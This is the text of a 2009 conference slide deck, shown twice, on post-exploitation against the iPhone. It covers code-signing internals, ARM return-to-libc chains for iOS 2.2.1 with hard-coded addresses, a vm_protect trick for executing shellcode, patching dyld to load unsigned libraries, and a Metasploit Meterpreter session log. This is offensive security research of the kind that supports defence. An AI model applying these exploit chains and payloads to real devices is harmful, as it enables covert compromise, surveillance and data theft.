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Post Exploitation Bliss:
Meterpreter for iPhone
Charlie MIller                    Vincenzo Iozzo
Independent Security Evaluators   Zynamics & Secure Network
cmiller@securityevaluators.com    vincenzo.iozzo@zynamics.com
Who we are
  First to hack the iPhone, G1 Phone
  Pwn2Own winner, 2008, 2009
  Author: Mac Hackers Handbook
  Student at Politecnico di Milano
  Security Consultant at Secure Network srl
  Reverse Engineer at Zynamics GmbH

iPhone 2 security architecture
iPhone 2 memory protections
iPhone 3 changes
Current thoughts on iPhone 3 payloads
iPhone 2 Security Architecture
Jailbroken: various patches, can access FS, run unsigned
code, etc
Development: click “use for development” in Xcode. Adds
some debugging tools
Provisioned: Can run Apple code or from developer phone
is provisioned for
Factory phones: no modifications at all
Warning: Testing only on first 3
Security Architecture Overview

Reduced attack surface
Stripped down OS
Code signing
Randomization (or lack thereof)
Memory protections
iPhone 2 memory protections
iPhone 1 & 2

Version 1: Heap was RWX, easy to run shellcode
Version 2: No RWX pages
 On Jailbroken can go from RW -> RX
 Not on Development or Provisioned (or Factory) phones
 CSW talks assumed jailbroken
Some facts about code
On execve() the kernel searches for a segment
LC_CODE_SIGNATURE which contains the signature
If the signature is already present in the kernel it is validated
using SHA-1 hashes and offsets
If the signature is not found it is validated and allocated,
SHA-1 hashes are checked too
Hashes are calculated on the whole page, so we cannot
write malicious code in the slack space
What’s the effect of code signing?

  When a page is signed the kernel adds a flag to that page

/* mark this vnode's VM object as having "signed pages" */
 kr = memory_object_signed(uip->ui_control, TRUE);
What if a page is not signed?

We can still map a page (following XN policy) with RX
Whenever we try to access that page a SIGBUS is raised
If we try to change permissions of a page to enable
execution (using mprotect or vm_protect), the call fails*
Why breaking codesigning
   breaks memory protections
if (cur_protection & VM_PROT_WRITE) {
   if (cur_protection & VM_PROT_EXECUTE) {
      printf("EMBEDDED: %s curprot cannot be write+execute. turning off executen",
      cur_protection &= ~VM_PROT_EXECUTE;
if (max_protection & VM_PROT_WRITE) {
   if (max_protection & VM_PROT_EXECUTE) {
      /* Right now all kinds of data segments are RWX. No point in logging that. */
      /* printf("EMBEDDED: %s maxprot cannot be write+execute. turning off executen",
      __PRETTY_FUNCTION__); */
      /* Try to take a hint from curprot. If curprot is not writable,
      * make maxprot not writable. Otherwise make it not executable.
      if((cur_protection & VM_PROT_WRITE) == 0) {
         max_protection &= ~VM_PROT_WRITE;
      } else {
         max_protection &= ~VM_PROT_EXECUTE;   <------ NOP’d by jailbreak
assert ((cur_protection | max_protection) == max_protection);
#endif /* CONFIG_EMBEDDED */
Thoughts about getting
shellcode running

Can’t write shellcode to RW and turn to RX
Can’t allocate RX heap page (hoping to have data there)
Can’t change a RX page to RW and back
How the hell do debuggers set software breakpoints?
This does work!
void (*f)();
unsigned int addy = 0x31414530; // getchar()
unsigned int ssize = sizeof(shellcode3);
kern_return_t r ;
r = vm_protect( mach_task_self(), (vm_address_t) addy, ssize,
   printf("vm_protect is cooln");

memcpy((unsigned int *) addy, shellcode3, sizeof(shellcode3));
f = (void (*)()) addy;

  So we can overwrite local copies of libraries with our
              shellcode and execute it
How to run code?

Can’t write and execute code from unsigned pages
Can’t write to file and exec/dlopen
However, nothing is randomized
So we can use return-to-libc/return-oriented-programming
ARM basics
16 32-bit registers, r0-r15

  r13 = sp, stack pointer

  r14 = lr, link register - stores return address

  r15 = pc, program counter

RISC - few instructions, mostly uniform length

  Placing a dword in a register usually requires more than 1

Can switch to Thumb mode (2 or 4 byte instructions)
Function calls
 Instead of {jmp, call} you get {b, bl, bx, blx}

 b (branch) changes execution to offset from pc specified

 bl does same but sets lr to next instruction (ret address)
 •   In particular, ret addy not on stack

 bx/blx similar except address is absolute

 pc is a general purpose register, i.e. mov pc, r1 works

 First 4 arguments passed in r0-r3, rest on the stack
Example, ARM
Example, Thumb
Return-to-libc, x86

Reuse executable code already in process
Layout data near ESP such that arguments and return
addresses are used from user supplied data
This is a pain....
  Typically, quickly try to call system() or a function to
  disable DEP (or mprotect)
ARM issues

Function arguments passed in registers, not on stack
 Must always find code to load stack values into registers
Can’t “create” instructions by jumping to middle of existing
instructions (unlike x86)
Return address not always stored on stack
Payload: Beep and Vibrate
The second ever iPhone payload - v 1.0.0
Replicate what happens when a text message is received:
vibrate and beep
We want to have the following code executed

So I wrote this little program

void foo(unsigned int *shellcode){
  char buf[8];
  memcpy(buf, shellcode, sizeof(int) * 25);

        It’s stupid, but serves its purpose
Set r0-r3, PC

    shellcode1a[0]   =0x11112222;
    shellcode1a[1]   =0x33334444;
    shellcode1a[2]   =0x12345566;    // r7
    shellcode1a[3]   =0x314e4bec;    // PC

0x314e4bec: ldmia sp!, {r0, r1, r2, r3, pc}

                             All addresses for 2.2.1
Call AudioServicesPlaySystemSound

  shellcode1a[4]=0x000003ea;     //   r0
  shellcode1a[5]=0x00112233;     //   r1
  shellcode1a[6]=0xddddeeee;     //   r2
  shellcode1a[7]=0xffff0000;     //   r3
  shellcode1a[8]=0x34945568;     //   PC

0x34945568 = AudioServicesPlaySystemSound + 4
0x34945564 <AudioServicesPlaySystemSound+0>: push {r4, r7, lr}
0x34945568 <AudioServicesPlaySystemSound+4>: add r7, sp, #4
0x3494556c <AudioServicesPlaySystemSound+8>: mov r4, r0
0x34945570 <AudioServicesPlaySystemSound+12>:    bl 0x349420f4
0x34945574 <AudioServicesPlaySystemSound+16>:    cmp r0, #0 ; 0x0
0x34945578 <AudioServicesPlaySystemSound+20>:    popeq {r4, r7, pc}
0x3494557c <AudioServicesPlaySystemSound+24>:    bl 0x34943c98
0x34945580 <AudioServicesPlaySystemSound+28>:    cmp r0, #0 ; 0x0
0x34945584 <AudioServicesPlaySystemSound+32>:    popeq {r4, r7, pc}
0x34945588 <AudioServicesPlaySystemSound+36>:    mov r0, #1 ; 0x1
0x3494558c <AudioServicesPlaySystemSound+40>:    bl 0x3494332c
0x34945590 <AudioServicesPlaySystemSound+44>:    subs r1, r0,
0x34945594 <AudioServicesPlaySystemSound+48>:    popne {r4, r7, pc}
0x34945598 <AudioServicesPlaySystemSound+52>:    mov r0, r4
0x3494559c <AudioServicesPlaySystemSound+56>:    mov r2, r1
0x349455a0 <AudioServicesPlaySystemSound+60>:    pop {r4, r7, lr}
0x349455a4 <AudioServicesPlaySystemSound+64>:    b 0x34944a40

By not jumping to the first instruction, lr is not pushed on
the stack
When lr is popped off the stack, it will pop a value we
We regain control and call exit at this point
Call _exit()

 shellcode1a[9] = 0x11112222; // r4
 shellcode1a[10] = 0x33324444; // r7
 shellcode1a[11] = 0x31463018; // lr

     should probably set something in r0...

 Debugger stopped.
 Program exited with status value:0.

               iPhone 2.2.1
              Not jailbroken
           Development phone
        (would work on 3.0 factory)
Payload: Arbitrary shellcode
   We craft return-to-libc for the following C code

vm_protect( mach_task_self(), (vm_address_t) addy, size,
memcpy(addy, shellcode, size);
Similar start
char realshellcodestatic[] =

unsigned int *realshellcode = malloc(128 *
memcpy(realshellcode, realshellcodestatic,

shellcode3a[0]   =0x11112222;
shellcode3a[1]   =0x33334444;
shellcode3a[2]   =0x12345566;   // r7
shellcode3a[3]   =0x314e4bec;   // PC
Call protect()
shellcode3a[4]=0x31414530; // r0 getchar()
shellcode3a[5]=0x00112233; // r1
shellcode3a[6]=0x00000013; // r2 VM_PROT_READ |
shellcode3a[7]=0x00000004; // r3 Do
max_protection = FALSE
shellcode[8]=0x3145677c; // PC protect() + 4

    protect() calls vm_protect with mach_task_self() and
                        size 0x1000

    0x31456828 <protect+176>: pop {r4, r5, r6, r7, pc}
Load up for call to memcpy

 shellcode3a[9] =0x12345678;   //   r4
 shellcode3a[10]=0x23456789;   //   r5
 shellcode3a[11]=0x3456789a;   //   r6
 shellcode3a[12]=0x456789ab;   //   r7
 shellcode3a[13]=0x314e4bec;   //   PC
Call memmove
shellcode3a[14]    =   0x31414530; // r0 getchar()
shellcode3a[15]    =   (unsigned int) realshellcode; // r1
shellcode3a[16]    =   sizeof(realshellcodestatic); // r2
shellcode3a[17]    =   0xddd4eeee; // r3
shellcode3a[18]    =   0x31408b7b; // PC

0x31408b7b <__memmove_chk+13>:   blx 0x314ee04c <dyld_stub_memmove>
0x31408b7f <__memmove_chk+17>:   pop {r7, pc}
Call our shellcode

shellcode3a[19] =0x33364444; // r7
shellcode3a[20] =0x31414530; // PC   getchar()

             iPhone 2.2.1
             Not jailbroken
          Development phone
    (would work on 2.2.1 provisioned)
The next step

We can run our shellcode now
The shellcode could do anything you care to make it do
Higher level payloads would be cooler
If we could load an unsigned library, that would be nice!
Since we’re already running, we can muck with the local
copy of dyld, the dynamic loader (using the same trick we
used to get our code running)
Mapping a library

Map injected library upon an already mapped (signed)
  Each segment we vm_protect RW, write, then
  vm_protect to the expected permissions
At this point library is mapped, but not linked

On Mac OS X, there are lots of ways to do this
  On iPhone they removed them all :(
  Except from one used to load the main binary
We just write the library to disk
Call dlopen on it
And patch dyld to ignore code signing
Loading from memory
So we’re done?

Not really
When the library is linked it searches for symbols in each
linked library
*each linked library* means even the one we have
One last patch

Before overwriting the victim library we force dlclose() to
unlink it
To “force” means to ignore the garbage collector for
We need to be careful tough, some frameworks will crash if
the are forced to be unloaded
It’s done
Patching results

Once our code is running in a signed process we can load
unsigned libraries
These libraries can be written in C, C++, Obj-C, etc
Can do fun things like DDOS, GPS, listening device etc
Originally an advanced Metasploit payload for Windows
Bring along your own tools, don’t trust system tools
  instead of exec’ing /bin/sh and then /bin/ls, all code runs within the
  exploited process
  Meterpreter doesn’t appear on disk
Modular: Can upload modules which include additional functionality
Better than a shell
  Upload, download, and edit files on the fly
  Redirect traffic to other hosts (pivoting)

A Mac OS X port of Meterpreter for Windows
Porting from Mac OS X to iPhone is almost just a recompile
 Monolithic (loading dynamic libraries is hard)
 Runs in own thread (watchdog protection)
 Can’t exec other programs
Adding code is fun (and easy)
#include <AudioToolbox/AudioServices.h>

 * Vibrates and plays a sound

DWORD request_fs_vibrate(Remote *remote, Packet *packet)
   Packet *response = packet_create_response(packet);


    packet_add_tlv_uint(response, TLV_TYPE_RESULT, result);
    packet_transmit(remote, response, NULL);
    return ERROR_SUCCESS;
Code added to Metasploit
Shellcode for bin_tcp
  Has to do the “memory trick”
  Involves calls to vm_protect, overwritting a loaded library, etc.
  ~400 bytes
Shellcode for inject_dylib
  Has to write dylib to disk, patch dyld, dlopen file
  ~4000 bytes

              iPhone 2.2.1
             Not Jailbroken
            Not Development
        Using Ad-Hoc distribution
/msfcli exploit/osx/test/exploit RHOST= RPORT=5555 LPORT=4444 PAYLOAD=osx/armle/meterpreter/
bind_tcp DYLIB=metsrv-combo-phone.dylib AutoLoadStdapi=False E
[*] Started bind handler
[*] Transmitting stage length value...(3884 bytes)
[*] Sending stage (3884 bytes)
[*] Sleeping before handling stage...
[*] Uploading Mach-O dylib (97036 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened ( ->

meterpreter > use stdapi
Loading extension stdapi...success.
meterpreter > pwd
meterpreter > ls

Listing: /

Mode              Size Type Last modified                    Name
----              ---- ---- -------------                    ----
41775/rwxrwxr-x 612     dir  Fri Jan 09 16:57:35 -0800 2009 .
41775/rwxrwxr-x 612     dir  Fri Jan 09 16:57:35 -0800 2009 ..
40700/rwx------ 170     dir  Fri Jan 09 16:38:07 -0800 2009 .fseventsd
40775/rwxrwxr-x 782     dir  Fri Jan 09 16:38:33 -0800 2009 Applications
40775/rwxrwxr-x 68      dir  Thu Dec 18 20:56:18 -0800 2008 Developer
40775/rwxrwxr-x 680     dir  Fri Jan 09 16:38:59 -0800 2009 Library
meterpreter > ps
     43   MobilePhone
     344 HelloWorld
meterpreter > vibrate
meterpreter > getpid
Current pid: 344
meterpreter > getuid
Server username: mobile
meterpreter > cat /var/mobile/.forward
meterpreter > portfwd add -l 2222 -p 22 -r
[*] Local TCP relay created: <->
meterpreter > exit
iPhone 3
The day: June 17, 2009
So can we do this on 3.x?
Does the “trick” work?
Worked on jailbroken
Worked on development phone
  In fact, you could just go from RW->RX without the trick
  Only worked when process was actually being debugged
  Can trick it to work all the time if you call ptrace(0,0,0,0)
Doesn’t work on provisioned (or presumably factory) phones :(
  Ad-hoc distribution requires “get-task-allow” set to false
  Would still work on any binary with this entitlement
  They locked down the memory tighter, those bastards!
First things first

 If we use 2.x trick what happens is that the process is
 killed as soon as we try to execute anything on the
What’s the difference
between the two?
iPhone 2.x                 iPhone 3.x
vm_protect() PROT_COPY
trick (“act like a         XN is not really enforced
debugger”)                 something cares about
Apparently the kernel      “get-task-allow” (can’t “act
doesn’t care about “get-   like a debugger”)
task-allow”                ptrace() plays a key role
dyld plays a key role
2.xif (m->cs_tainted)
  	 	       kr = KERN_SUCCESS;
  	 	       if (!cs_enforcement_disable) {
  	 	       	 if (cs_invalid_page((addr64_t) vaddr)) {
  	 if (m->cs_tainted || (prot & VM_PROT_EXECUTE) && !m->cs_validated ))
  	 	   kr = KERN_SUCCESS;
  	 	   if (!cs_enforcement_disable) {
  	 	   	 if (cs_invalid_page((addr64_t) vaddr)) {
Why ptrace() should help
setting breakpoints?
 Whenever you call ptrace() with PT_TRACE_ME or
 PT_ATTACH cs_allow_invalid() is called
 cs_allow_invalid() checks if it’s possible to disable code
 signing on the pages of a process
 cs_allow_invalid() disables code signing on both the
 parent process and the child

 It verifies if a MAC policy denies disabling code signing
 It checks if cs_debug is set
 Eventually it disables process killing and enables
 VM_PROT_COPY flag on process pages
          proc->p_csflags & 0xfffffcfe;

      #define	 CS_VALID		       0x0001	 /* dynamically valid */
      #define	 CS_HARD	 	   	   0x0100	 /* don't load invalid pages */
      #define	 CS_KILL	 	   	   0x0200	 /* kill process if it becomes invalid */

  	    /* CS_KILL triggers us to send a kill signal. Nothing else. */
  	    if (p->p_csflags & CS_KILL) {
  	    	     psignal(p, SIGKILL);
  	    /* CS_HARD means fail the mapping operation so the process stays valid. */
  	    if (p->p_csflags & CS_HARD) {
         	   retval = 1;
         else {
  	    	     if (p->p_csflags & CS_VALID) {
  	    	     	   p->p_csflags &= ~CS_VALID;
ohwell... (2)
  vmmap_t *proc_map = get_task_map(proc->task);
  proc_map->prot_copy_allow = 1;
A few words on MAC

It’s a granular policy system for managing both kernel
space and userspace entities
Policies are encapsulated in kernel modules
Amongst the other things it can hook system calls,
modify memory management behavior
How it works in our case

 MAC policies list is iterated and it retrieves a function
 pointer inside the policy structure
 The function it’s called and it performs its checks
 If *any* of the functions fails at granting the permission
 code signing is not disabled
The mysterious functions
So far it appears that only AMFI(Apple Mobile File
Integrity) kext registers a function
It checks if a process has one of the following
A less “mysterious” look
When AMFI registers the
MAC policy
It appears that as soon as a process is created AMFI
registers a MAC policy with information taken from
seatbelt profile and entitlements
Some applications have builtin profiles in the kernel
most notably:
How does the story
Join us and Dino at the

Contact us at cmiller@securityevaluators.com

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Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat USA 2009

  • 1. Post Exploitation Bliss: Meterpreter for iPhone Charlie MIller Vincenzo Iozzo Independent Security Evaluators Zynamics & Secure Network cmiller@securityevaluators.com vincenzo.iozzo@zynamics.com
  • 2. Who we are Charlie First to hack the iPhone, G1 Phone Pwn2Own winner, 2008, 2009 Author: Mac Hackers Handbook Vincenzo Student at Politecnico di Milano Security Consultant at Secure Network srl Reverse Engineer at Zynamics GmbH
  • 3. Agenda iPhone 2 security architecture iPhone 2 memory protections Payloads Meterpreter iPhone 3 changes Current thoughts on iPhone 3 payloads
  • 4. iPhone 2 Security Architecture
  • 5. iPhones Jailbroken: various patches, can access FS, run unsigned code, etc Development: click “use for development” in Xcode. Adds some debugging tools Provisioned: Can run Apple code or from developer phone is provisioned for Factory phones: no modifications at all Warning: Testing only on first 3
  • 6. Security Architecture Overview Reduced attack surface Stripped down OS Code signing Randomization (or lack thereof) Sandboxing Memory protections
  • 7. iPhone 2 memory protections
  • 8. iPhone 1 & 2 Version 1: Heap was RWX, easy to run shellcode Version 2: No RWX pages On Jailbroken can go from RW -> RX Not on Development or Provisioned (or Factory) phones CSW talks assumed jailbroken
  • 9. Some facts about code signing On execve() the kernel searches for a segment LC_CODE_SIGNATURE which contains the signature If the signature is already present in the kernel it is validated using SHA-1 hashes and offsets If the signature is not found it is validated and allocated, SHA-1 hashes are checked too Hashes are calculated on the whole page, so we cannot write malicious code in the slack space
  • 10. What’s the effect of code signing? When a page is signed the kernel adds a flag to that page /* mark this vnode's VM object as having "signed pages" */ kr = memory_object_signed(uip->ui_control, TRUE);
  • 11. What if a page is not signed? We can still map a page (following XN policy) with RX permissions Whenever we try to access that page a SIGBUS is raised If we try to change permissions of a page to enable execution (using mprotect or vm_protect), the call fails*
  • 12. Why breaking codesigning breaks memory protections #if CONFIG_EMBEDDED if (cur_protection & VM_PROT_WRITE) { if (cur_protection & VM_PROT_EXECUTE) { printf("EMBEDDED: %s curprot cannot be write+execute. turning off executen", __PRETTY_FUNCTION__); cur_protection &= ~VM_PROT_EXECUTE; } } if (max_protection & VM_PROT_WRITE) { if (max_protection & VM_PROT_EXECUTE) { /* Right now all kinds of data segments are RWX. No point in logging that. */ /* printf("EMBEDDED: %s maxprot cannot be write+execute. turning off executen", __PRETTY_FUNCTION__); */ /* Try to take a hint from curprot. If curprot is not writable, * make maxprot not writable. Otherwise make it not executable. */ if((cur_protection & VM_PROT_WRITE) == 0) { max_protection &= ~VM_PROT_WRITE; } else { max_protection &= ~VM_PROT_EXECUTE; <------ NOP’d by jailbreak } } } assert ((cur_protection | max_protection) == max_protection); #endif /* CONFIG_EMBEDDED */
  • 13. Thoughts about getting shellcode running Can’t write shellcode to RW and turn to RX Can’t allocate RX heap page (hoping to have data there) Can’t change a RX page to RW and back How the hell do debuggers set software breakpoints?
  • 14. This does work! void (*f)(); unsigned int addy = 0x31414530; // getchar() unsigned int ssize = sizeof(shellcode3); kern_return_t r ; r = vm_protect( mach_task_self(), (vm_address_t) addy, ssize, FALSE, VM_PROT_READ |VM_PROT_WRITE | VM_PROT_COPY); if(r==KERN_SUCCESS){ printf("vm_protect is cooln"); } memcpy((unsigned int *) addy, shellcode3, sizeof(shellcode3)); f = (void (*)()) addy; f(); So we can overwrite local copies of libraries with our shellcode and execute it
  • 16. How to run code? Can’t write and execute code from unsigned pages Can’t write to file and exec/dlopen However, nothing is randomized So we can use return-to-libc/return-oriented-programming
  • 17. ARM basics 16 32-bit registers, r0-r15 r13 = sp, stack pointer r14 = lr, link register - stores return address r15 = pc, program counter RISC - few instructions, mostly uniform length Placing a dword in a register usually requires more than 1 instruction Can switch to Thumb mode (2 or 4 byte instructions)
  • 18. Function calls Instead of {jmp, call} you get {b, bl, bx, blx} b (branch) changes execution to offset from pc specified bl does same but sets lr to next instruction (ret address) • In particular, ret addy not on stack bx/blx similar except address is absolute pc is a general purpose register, i.e. mov pc, r1 works First 4 arguments passed in r0-r3, rest on the stack
  • 21. Return-to-libc, x86 Reuse executable code already in process Layout data near ESP such that arguments and return addresses are used from user supplied data This is a pain.... Typically, quickly try to call system() or a function to disable DEP (or mprotect)
  • 22. ARM issues Function arguments passed in registers, not on stack Must always find code to load stack values into registers Can’t “create” instructions by jumping to middle of existing instructions (unlike x86) Return address not always stored on stack
  • 23. Payload: Beep and Vibrate The second ever iPhone payload - v 1.0.0 Replicate what happens when a text message is received: vibrate and beep We want to have the following code executed AudioServicesPlaySystemSound(0x3ea); exit(0);
  • 24. So I wrote this little program void foo(unsigned int *shellcode){ char buf[8]; memcpy(buf, shellcode, sizeof(int) * 25); } It’s stupid, but serves its purpose
  • 25. Set r0-r3, PC shellcode1a[0] =0x11112222; shellcode1a[1] =0x33334444; shellcode1a[2] =0x12345566; // r7 shellcode1a[3] =0x314e4bec; // PC 0x314e4bec: ldmia sp!, {r0, r1, r2, r3, pc} All addresses for 2.2.1
  • 26. Call AudioServicesPlaySystemSound shellcode1a[4]=0x000003ea; // r0 shellcode1a[5]=0x00112233; // r1 shellcode1a[6]=0xddddeeee; // r2 shellcode1a[7]=0xffff0000; // r3 shellcode1a[8]=0x34945568; // PC 0x34945568 = AudioServicesPlaySystemSound + 4
  • 27. 0x34945564 <AudioServicesPlaySystemSound+0>: push {r4, r7, lr} 0x34945568 <AudioServicesPlaySystemSound+4>: add r7, sp, #4 0x3494556c <AudioServicesPlaySystemSound+8>: mov r4, r0 0x34945570 <AudioServicesPlaySystemSound+12>: bl 0x349420f4 <AudioServicesGetPropertyInfo+404> 0x34945574 <AudioServicesPlaySystemSound+16>: cmp r0, #0 ; 0x0 0x34945578 <AudioServicesPlaySystemSound+20>: popeq {r4, r7, pc} 0x3494557c <AudioServicesPlaySystemSound+24>: bl 0x34943c98 <AudioServicesRemoveSystemSoundCompletion+1748> 0x34945580 <AudioServicesPlaySystemSound+28>: cmp r0, #0 ; 0x0 0x34945584 <AudioServicesPlaySystemSound+32>: popeq {r4, r7, pc} 0x34945588 <AudioServicesPlaySystemSound+36>: mov r0, #1 ; 0x1 0x3494558c <AudioServicesPlaySystemSound+40>: bl 0x3494332c <AudioServicesGetPropertyInfo+5068> 0x34945590 <AudioServicesPlaySystemSound+44>: subs r1, r0, #0 0x34945594 <AudioServicesPlaySystemSound+48>: popne {r4, r7, pc} 0x34945598 <AudioServicesPlaySystemSound+52>: mov r0, r4 0x3494559c <AudioServicesPlaySystemSound+56>: mov r2, r1 0x349455a0 <AudioServicesPlaySystemSound+60>: pop {r4, r7, lr} 0x349455a4 <AudioServicesPlaySystemSound+64>: b 0x34944a40 <AudioServicesRemoveSystemSoundCompletion+5244>
  • 28. Progress By not jumping to the first instruction, lr is not pushed on the stack When lr is popped off the stack, it will pop a value we control We regain control and call exit at this point
  • 29. Call _exit() shellcode1a[9] = 0x11112222; // r4 shellcode1a[10] = 0x33324444; // r7 shellcode1a[11] = 0x31463018; // lr should probably set something in r0... Debugger stopped. Program exited with status value:0.
  • 30. Demo! iPhone 2.2.1 Not jailbroken Development phone (would work on 3.0 factory)
  • 31. Payload: Arbitrary shellcode We craft return-to-libc for the following C code vm_protect( mach_task_self(), (vm_address_t) addy, size, FALSE, VM_PROT_READ |VM_PROT_WRITE | VM_PROT_COPY); memcpy(addy, shellcode, size); addy()
  • 32. Similar start char realshellcodestatic[] = "x01x00xa0xe3x02x10xa0xe3" "x03x30xa0xe3x04x40xa0xe3” “x05x50xa0xe3x06x60xa0xe3" "xf8xffxffxea"; unsigned int *realshellcode = malloc(128 * sizeof(int)); memcpy(realshellcode, realshellcodestatic, sizeof(realshellcodestatic)); shellcode3a[0] =0x11112222; shellcode3a[1] =0x33334444; shellcode3a[2] =0x12345566; // r7 shellcode3a[3] =0x314e4bec; // PC
  • 33. Call protect() shellcode3a[4]=0x31414530; // r0 getchar() shellcode3a[5]=0x00112233; // r1 shellcode3a[6]=0x00000013; // r2 VM_PROT_READ | VM_PROT_WRITE | VM_PROT_COPY shellcode3a[7]=0x00000004; // r3 Do max_protection = FALSE shellcode[8]=0x3145677c; // PC protect() + 4 protect() calls vm_protect with mach_task_self() and size 0x1000 0x31456828 <protect+176>: pop {r4, r5, r6, r7, pc}
  • 34. Load up for call to memcpy shellcode3a[9] =0x12345678; // r4 shellcode3a[10]=0x23456789; // r5 shellcode3a[11]=0x3456789a; // r6 shellcode3a[12]=0x456789ab; // r7 shellcode3a[13]=0x314e4bec; // PC
  • 35. Call memmove shellcode3a[14] = 0x31414530; // r0 getchar() shellcode3a[15] = (unsigned int) realshellcode; // r1 shellcode3a[16] = sizeof(realshellcodestatic); // r2 shellcode3a[17] = 0xddd4eeee; // r3 shellcode3a[18] = 0x31408b7b; // PC 0x31408b7b <__memmove_chk+13>: blx 0x314ee04c <dyld_stub_memmove> 0x31408b7f <__memmove_chk+17>: pop {r7, pc}
  • 36. Call our shellcode shellcode3a[19] =0x33364444; // r7 shellcode3a[20] =0x31414530; // PC getchar()
  • 37. Demo! iPhone 2.2.1 Not jailbroken Development phone (would work on 2.2.1 provisioned)
  • 39. The next step We can run our shellcode now The shellcode could do anything you care to make it do Higher level payloads would be cooler If we could load an unsigned library, that would be nice! Since we’re already running, we can muck with the local copy of dyld, the dynamic loader (using the same trick we used to get our code running)
  • 40. Mapping a library Map injected library upon an already mapped (signed) library Each segment we vm_protect RW, write, then vm_protect to the expected permissions At this point library is mapped, but not linked
  • 41. Linking On Mac OS X, there are lots of ways to do this On iPhone they removed them all :( Except from one used to load the main binary We just write the library to disk Call dlopen on it And patch dyld to ignore code signing
  • 43. So we’re done? Not really When the library is linked it searches for symbols in each linked library *each linked library* means even the one we have overwritten
  • 44. One last patch Before overwriting the victim library we force dlclose() to unlink it To “force” means to ignore the garbage collector for libraries We need to be careful tough, some frameworks will crash if the are forced to be unloaded
  • 46. Patching results Once our code is running in a signed process we can load unsigned libraries These libraries can be written in C, C++, Obj-C, etc Can do fun things like DDOS, GPS, listening device etc Or...Meterpreter!
  • 47. Meterpreter Originally an advanced Metasploit payload for Windows Bring along your own tools, don’t trust system tools Stealthier instead of exec’ing /bin/sh and then /bin/ls, all code runs within the exploited process Meterpreter doesn’t appear on disk Modular: Can upload modules which include additional functionality Better than a shell Upload, download, and edit files on the fly Redirect traffic to other hosts (pivoting)
  • 48. Macterpreter A Mac OS X port of Meterpreter for Windows Porting from Mac OS X to iPhone is almost just a recompile Differences Monolithic (loading dynamic libraries is hard) Runs in own thread (watchdog protection) Can’t exec other programs
  • 49. Adding code is fun (and easy) #include <AudioToolbox/AudioServices.h> /* * Vibrates and plays a sound */ DWORD request_fs_vibrate(Remote *remote, Packet *packet) { Packet *response = packet_create_response(packet); DWORD result = ERROR_SUCCESS; AudioServicesPlaySystemSound(0x3ea); packet_add_tlv_uint(response, TLV_TYPE_RESULT, result); packet_transmit(remote, response, NULL); return ERROR_SUCCESS; }
  • 50. Code added to Metasploit Shellcode for bin_tcp Has to do the “memory trick” Involves calls to vm_protect, overwritting a loaded library, etc. ~400 bytes Shellcode for inject_dylib Has to write dylib to disk, patch dyld, dlopen file ~4000 bytes
  • 51. Demo! iPhone 2.2.1 Not Jailbroken Not Development Using Ad-Hoc distribution
  • 52. /msfcli exploit/osx/test/exploit RHOST= RPORT=5555 LPORT=4444 PAYLOAD=osx/armle/meterpreter/ bind_tcp DYLIB=metsrv-combo-phone.dylib AutoLoadStdapi=False E [*] Started bind handler [*] Transmitting stage length value...(3884 bytes) [*] Sending stage (3884 bytes) [*] Sleeping before handling stage... [*] Uploading Mach-O dylib (97036 bytes)... [*] Upload completed. [*] Meterpreter session 1 opened ( -> meterpreter > use stdapi Loading extension stdapi...success. meterpreter > pwd / meterpreter > ls Listing: / ========== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 41775/rwxrwxr-x 612 dir Fri Jan 09 16:57:35 -0800 2009 . 41775/rwxrwxr-x 612 dir Fri Jan 09 16:57:35 -0800 2009 .. 40700/rwx------ 170 dir Fri Jan 09 16:38:07 -0800 2009 .fseventsd 40775/rwxrwxr-x 782 dir Fri Jan 09 16:38:33 -0800 2009 Applications 40775/rwxrwxr-x 68 dir Thu Dec 18 20:56:18 -0800 2008 Developer 40775/rwxrwxr-x 680 dir Fri Jan 09 16:38:59 -0800 2009 Library ... meterpreter > ps ... 43 MobilePhone 344 HelloWorld meterpreter > vibrate meterpreter > getpid Current pid: 344 meterpreter > getuid Server username: mobile meterpreter > cat /var/mobile/.forward /dev/null meterpreter > portfwd add -l 2222 -p 22 -r [*] Local TCP relay created: <-> meterpreter > exit
  • 54. The day: June 17, 2009
  • 55. So can we do this on 3.x?
  • 56. Does the “trick” work? Worked on jailbroken Worked on development phone In fact, you could just go from RW->RX without the trick Only worked when process was actually being debugged Can trick it to work all the time if you call ptrace(0,0,0,0) Doesn’t work on provisioned (or presumably factory) phones :( Ad-hoc distribution requires “get-task-allow” set to false Would still work on any binary with this entitlement They locked down the memory tighter, those bastards!
  • 57. First things first If we use 2.x trick what happens is that the process is killed as soon as we try to execute anything on the page
  • 58. What’s the difference between the two? iPhone 2.x iPhone 3.x vm_protect() PROT_COPY trick (“act like a XN is not really enforced debugger”) something cares about Apparently the kernel “get-task-allow” (can’t “act doesn’t care about “get- like a debugger”) task-allow” ptrace() plays a key role dyld plays a key role
  • 59. Why? 2.xif (m->cs_tainted) { kr = KERN_SUCCESS; if (!cs_enforcement_disable) { if (cs_invalid_page((addr64_t) vaddr)) { 3.x if (m->cs_tainted || (prot & VM_PROT_EXECUTE) && !m->cs_validated )) { kr = KERN_SUCCESS; if (!cs_enforcement_disable) { if (cs_invalid_page((addr64_t) vaddr)) {
  • 60. Why ptrace() should help setting breakpoints? Whenever you call ptrace() with PT_TRACE_ME or PT_ATTACH cs_allow_invalid() is called cs_allow_invalid() checks if it’s possible to disable code signing on the pages of a process cs_allow_invalid() disables code signing on both the parent process and the child
  • 62. cs_allow_invalid() It verifies if a MAC policy denies disabling code signing It checks if cs_debug is set Eventually it disables process killing and enables VM_PROT_COPY flag on process pages
  • 64. ohwell.. CS_ALLOW_INVALID() proc->p_csflags & 0xfffffcfe; CS_INVALID_PAGE() #define CS_VALID 0x0001 /* dynamically valid */ #define CS_HARD 0x0100 /* don't load invalid pages */ #define CS_KILL 0x0200 /* kill process if it becomes invalid */ /* CS_KILL triggers us to send a kill signal. Nothing else. */ if (p->p_csflags & CS_KILL) { cs_procs_killed++; psignal(p, SIGKILL); proc_lock(p); } /* CS_HARD means fail the mapping operation so the process stays valid. */ if (p->p_csflags & CS_HARD) { retval = 1; else { if (p->p_csflags & CS_VALID) { p->p_csflags &= ~CS_VALID; cs_procs_invalidated++;
  • 65. ohwell... (2) vmmap_t *proc_map = get_task_map(proc->task); proc_map->prot_copy_allow = 1;
  • 66. A few words on MAC It’s a granular policy system for managing both kernel space and userspace entities Policies are encapsulated in kernel modules Amongst the other things it can hook system calls, modify memory management behavior
